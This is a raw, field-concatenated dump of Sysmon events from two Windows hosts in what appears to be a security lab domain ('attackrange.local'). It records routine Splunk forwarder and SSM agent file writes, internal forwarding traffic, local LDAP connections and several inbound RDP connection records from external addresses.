Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D82AB69DF90D038CA04EE26BE201C90,SHA256=B4F55670F58F09B5155819D4815A77F2C3787F2C8A0FB3792F597349D734879F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:09.863{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25C8BB677492850DCCDE85533E82F746,SHA256=A9A43FC2A0CCF433A12A74A49E9AD56C805F15BEEBD05D02C503A4B6807AB93E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:08.439{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de64660-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:07.791{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58134-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001047946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:09.406{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:09.006{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFE7E611E2FD903F27C86FE88CE52DD8,SHA256=BB4C529CD783B912A60A1909BB8E93D1DAC7F192F2A6101F1D083E0CFD136EE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:10.872{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FA6C82EF59C3D02584A9968177E9259,SHA256=38D24A28290192BEE6AA0F0E91BA0620FD69269E9CC958FFB97E51925E50FA85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:10.030{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F353E004DCE3D93CC9D4A343FBF71E97,SHA256=EDB8ADB7AECD60E97043FE4CA511FB4B2EF9D2526BC064E0E66B76AA1F4F2B66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:07.327{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-56650-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:06.828{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-12296-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:11.888{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E69525249FD7E9D220B20C3E1A583C,SHA256=FF13691A03E4D7B78535A1D0DAB8C2348F4B91C4B3F30F667A121335A769ACA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:11.063{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F58C2032CFF5B1640A4077F6D33B18F,SHA256=AC095F101BB017EFB9F7A23321AB898F4DBDCBC6830A9028F641B21031EFD0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:12.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C3E0775FB765B4385DD2E9F6A85E3FE,SHA256=64C0A29AB03240613565813B9A2850C3B6F042D9A9952A10D3A6652456BF4B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:12.083{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDD90A81E96D997CC70EF34B7D9CDFC,SHA256=BCCD1351DED183AFFFDD621F66F3C56624B72E6C681021C1486F25556A3AF079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:13.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4B50F22108D0FB89C9203083FD5A0A,SHA256=5797CAF1654147985C06D438DB455A0357E76F5A337DDB4212F076076741E2E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:13.131{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=064FA5514F40AB6E2F21AC8193E6A85D,SHA256=F989F1466D68A81D153ED2DEAEB2CEEE11053D71D3EFCAF1B5E158B1F5D1FBD3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:09.886{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-24166-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:13.451{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:14.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066F23316447C12B6B61DADF41B65EB5,SHA256=B4B3A53EF801FB10DF7D4218A10C362B1872C6D7AFDB91165B031C477C75DBC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:14.146{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B379D3979441C99CC83D82E26B59F5BA,SHA256=34BFC60176908D266F76E8351292A4D632DFB67DD02BE5BCE1B53DD7A2C90152,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:11.860{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59256-false10.0.1.12-8000- 354300x80000000000000001047955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:11.875{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:15.935{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7CD8651A00A325378D2968C80379560,SHA256=B996F5D388EE88B3E5898EB3A1DD74CED72C662099B788EB2B62F104AD027348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:15.421{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4297MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:15.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00E91AE65CFF37C89492E6C576DBE09E,SHA256=50E9E347F317AD0F30E16FDEB0FDDDF9EB733BF26FC35EC4B7368B969496CB02,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:12.079{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59257-false10.0.1.12-8089- 23542300x8000000000000000976473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:14.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F2619288260FB568D7B02B9D7874F0,SHA256=9E5644CE7368879528B45C953F32B00B450A1BAFEDCDA20AA40D5285F6F983E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:14.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A35A91D3EF04F4D436791BC784094E39,SHA256=05E2093DB87058B589952168B9F53791CC5BB7BA21B93E10397C69F1CC893CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:16.982{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F2619288260FB568D7B02B9D7874F0,SHA256=9E5644CE7368879528B45C953F32B00B450A1BAFEDCDA20AA40D5285F6F983E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:16.935{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E72D83F6BF1A7ED51685ADD79CD2C380,SHA256=160FDF80FBF2BD2B9CFE26EBE84F38FE9463C9EC925F509DEF8BF840CAA599BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:16.532{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\aborted-session-pingMD5=E607D29C51D064F90C975F4F2910CA7D,SHA256=C019359EF42E6AD081D81B08382CC96277448A2A2E5E874DBDA6CB321C286268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:16.433{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4298MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:16.232{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD7C3E9F000EFF0369B50299483D0344,SHA256=B8F041FF24B3E39388BBDD72EFFBE026195C9BC8692806D7E42FD47B0A49A81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:16.232{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D82AB69DF90D038CA04EE26BE201C90,SHA256=B4F55670F58F09B5155819D4815A77F2C3787F2C8A0FB3792F597349D734879F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:16.148{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485C7A5A5D7B7ECE81F724528115199C,SHA256=3DFB3ED22E407844C6400ABB966FF7E33E2C2F174E6923D73EAFA9C8536D5483,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:17.951{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45B79085D6D62BEF3A47F98C13BD2044,SHA256=174D94299A6143359E1527F02E53B537639262FE33496514A4B6A645759AE54F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:17.266{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD7C3E9F000EFF0369B50299483D0344,SHA256=B8F041FF24B3E39388BBDD72EFFBE026195C9BC8692806D7E42FD47B0A49A81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:17.166{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529BB63B8A1DF55F284BF94809771D83,SHA256=C612C7AD54E9606E8292647C01FDC6761AE0029B6059EA893CFC23AF72536EB7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:13.975{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-53985-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001047964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:14.607{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62297-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:18.951{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77A8386335362BF66B8B454A09587B2,SHA256=B3DF890E6D8E65FEE167713A0FE36ED4D166F260443B139F2BC6D051C6DDEBE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:18.215{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0F82773C4F4FB275D5CE6A76E99D5B,SHA256=451E3339DE5D1433F64EDC466668001C006C2E83EB9195AF7B7BE8D1B3EB354D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:15.318{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63505-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:18.201{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB11E501BEBFF5517D12B4F666F09237,SHA256=A02C034B8FC4301222775E49379BA08580F2F1D1B25CF0320B50459903A32724,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:15.939{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49220-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001047967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:15.939{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49220-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x8000000000000000976484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:19.966{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7762E0EBA27478B5B0D196E051ABBFBA,SHA256=F8D873368E4746E03CB5E85A111D94A153956341154364A1F10CD7E0534F90C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:19.234{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1187C10BE33016A9F89BD77EC9C4E0E9,SHA256=EFD9695BD315F7B8CB796D3097D594999EE37F76B9C4BA6B7A91AB0C8A2F3D9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:17.013{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-6893-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:20.982{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A15C99709BE2CC873AA9F69C303E9EB,SHA256=231E10F71DA38E51D713403993D9F1C7FA8B8B74980C6542B44FDA5AC6A0146F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:20.268{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4641F5A4E859D20ED45ED9BC240A5E6,SHA256=AE071D04D67BCC041EDFFEDF788465B86DF149228F458A814BA52FF8675CABAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:18.488{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64083-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:17.807{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49221-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000976485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:17.860{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59258-false10.0.1.12-8000- 23542300x80000000000000001047971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:20.134{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A2CC2EA2D4A9980B39B0F6C59A0494B,SHA256=AA3DEE6D381BD9CE434F05491472639DE23812C8B73AC1DCA9220ECCF03B6CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:21.336{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2438FA0AB9460151DDB091CEEF4B0C,SHA256=2A36E10EF8836252BF8C990A3391292FB91486AE4D1B8CC6D91D2E91B1DAD715,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:22.919{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla 